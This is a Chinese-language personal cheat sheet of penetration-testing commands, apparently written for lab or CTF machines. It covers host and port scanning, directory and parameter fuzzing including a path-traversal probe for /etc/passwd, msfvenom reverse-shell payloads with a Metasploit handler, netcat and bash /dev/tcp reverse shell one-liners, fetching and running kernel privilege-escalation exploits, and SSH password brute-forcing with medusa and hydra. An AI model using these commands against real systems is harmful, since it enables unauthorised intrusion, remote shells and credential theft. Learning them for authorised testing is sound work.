渗透工具及其知识库(个人笔记)

1.IP搜寻

查看kali网段: ip addr 、 ifconfig

namp:nmap -sP xxx.xxx.xxx.0/24

netdiscover:netdiscover xxx.xxx.xxx.0/24

arp:arp-scan -l

2.端口扫描

粗略扫描:nmap <IP>

深度扫描:

nmap -A -p- <IP>

nmap -T4 -A -v <IP>

3.指纹探测

whatweb <url>

cmseek -u <url>

4.目录扫描

gobuster

gobuster dir -u <url> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt -b '403,404'

dirb

dirb <url>

dirb <url> -x .php,.zip,.txt,.html 等

5.参数探测

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://192.168.232.128/index.php?FUZZ=index.php

wfuzz -c -u http://192.168.110.131/manage.php?FUZZ=../../../../../etc/passwd -w /usr/share/wfuzz/wordlist/general/common.txt -H "Cookie:PHPSESSID=l5r7estpbj5rrcfapfdhun8v6p"

6.msf木马文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.232.152 LPORT=7777 -o mshell.php

修改上述的php,生成不同的文件马

生成java jsp木马:msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.110.129 LPORT=4444 -f war > breach.war

木马使用

复制代码
use exploit/multi/handler
set payload java/jsp_shell_reverse_tcp
set lhost 192.168.110.129
set lport 4444
run

linux

/etc/passwd:存放相关用户信息

/etc/knock.conf:ssh保护机制knock的配置文件

/etc/*-release:查看操作系统

sudo -l

查看可以以root权限执行的文件和命令

查看内核

uname -a、uname -rms、hostnamectl

find

find / -name "xxx" 2>/dev/null

su

su user

ls -a

查看所有文件及其相关权限

ssh

ssh user@ip

md5加密

复制代码
md5加密
echo -n "ippsec" | md5sum
转为十六进制
echo -n "366a74cb3c959de17d61db30591c39d1" | od -An -t x1 |tr -d ' ' |tr -d '\n'
 
| od -An -t x1:管道 (|) 将 echo 输出的内容传递给 od(octal dump)命令。-An 参数表示不打印地址,-t x1 表示以十六进制形式输出每个字节。
| tr -d ' ':tr(translate)命令用于删除指定字符,这里的 -d ' ' 表示删除所有空格。
| tr -d '\n':再次使用 tr 命令删除所有的换行符(\n)。

openssl解密/加密

复制代码
echo '{要解密的字符串}' | openssl enc -d -a -{解密算法} -K {key值}

key:密钥的十六进制转码

/etc/passwd的用户密码(admin)编译

openssl passwd -1 -salt admin admin

-1 #使用md5加密算法

-salt #自动锚入一个随机参数作为文件内容加密

kali批量处理指令

for i in (cat CryptType);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' \| openssl enc -d -a -i -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null; echo $i;done

python交互性shell

python -c 'import pty;pty.spawn("/bin/bash")'

反弹shell

nc -e /bin/bash 192.168.110.129 5555

bash -i >& /dev/tcp/192.168.232.128/1234 0>&1

exp查询

内核提权:searchsploit privilege | grep CentOS (管理系统)

searchexploit xxx

search xxx

内核提权.1

拿到了xxx.c

gcc编译并另存:gcc xxx.c -o yf

(未'shell'之前)msf upload:upload ~/yf ./yf

赋权:chmod +x yf

执行:./yf

内核提权.2

找到xxx.c

放在网站目录:cp xxx.c /var/www/html

kali开启apache服务:service apache2 start

wget下载:wget http:<kali ip>/xxx.c

赋权:chmod 777 xxx.c

gcc编译:gcc xxx.c -o xxx

执行:./xxx

./keystore结合pcap(.p12)文件

复制代码
keytool -importkeystore -srckeystore <keystore的文件名> -destkeystore 文件名.p12 -deststoretype pkcs12 -srcalias tomcat

string

strings bill.png

knock敲门

knock 192.168.110.131 7469 8475 9842

端口监听

nc -lvp 5555

ssh密码爆破

medusa

medusa -M ssh -h 192.168.0.131 -u flag4 -P /usr/share/john/password.lst -e ns -F

hydra

echo 'flag4'>admin.txt
hydra -L admin.txt -P /usr/share/john/password.lst 192.168.0.131 ssh

相关推荐
使一颗心免于哀伤13 小时前
《设计模式之禅》笔记摘录 - 21.状态模式
笔记·设计模式
_落纸3 天前
三大基础无源电子元件——电阻(R)、电感(L)、电容(C)
笔记
Alice-YUE3 天前
【CSS学习笔记3】css特性
前端·css·笔记·html
2303_Alpha3 天前
SpringBoot
笔记·学习
Hello_Embed3 天前
STM32HAL 快速入门(二十):UART 中断改进 —— 环形缓冲区解决数据丢失
笔记·stm32·单片机·学习·嵌入式软件
咸甜适中3 天前
rust语言 (1.88) 学习笔记:客户端和服务器端同在一个项目中
笔记·学习·rust
Grassto3 天前
RAG 从入门到放弃?丐版 demo 实战笔记(go+python)
笔记
Magnetic_h3 天前
【iOS】设计模式复习
笔记·学习·ios·设计模式·objective-c·cocoa
周周记笔记3 天前
学习笔记:第一个Python程序
笔记·学习
丑小鸭是白天鹅3 天前
Kotlin协程详细笔记之切线程和挂起函数
开发语言·笔记·kotlin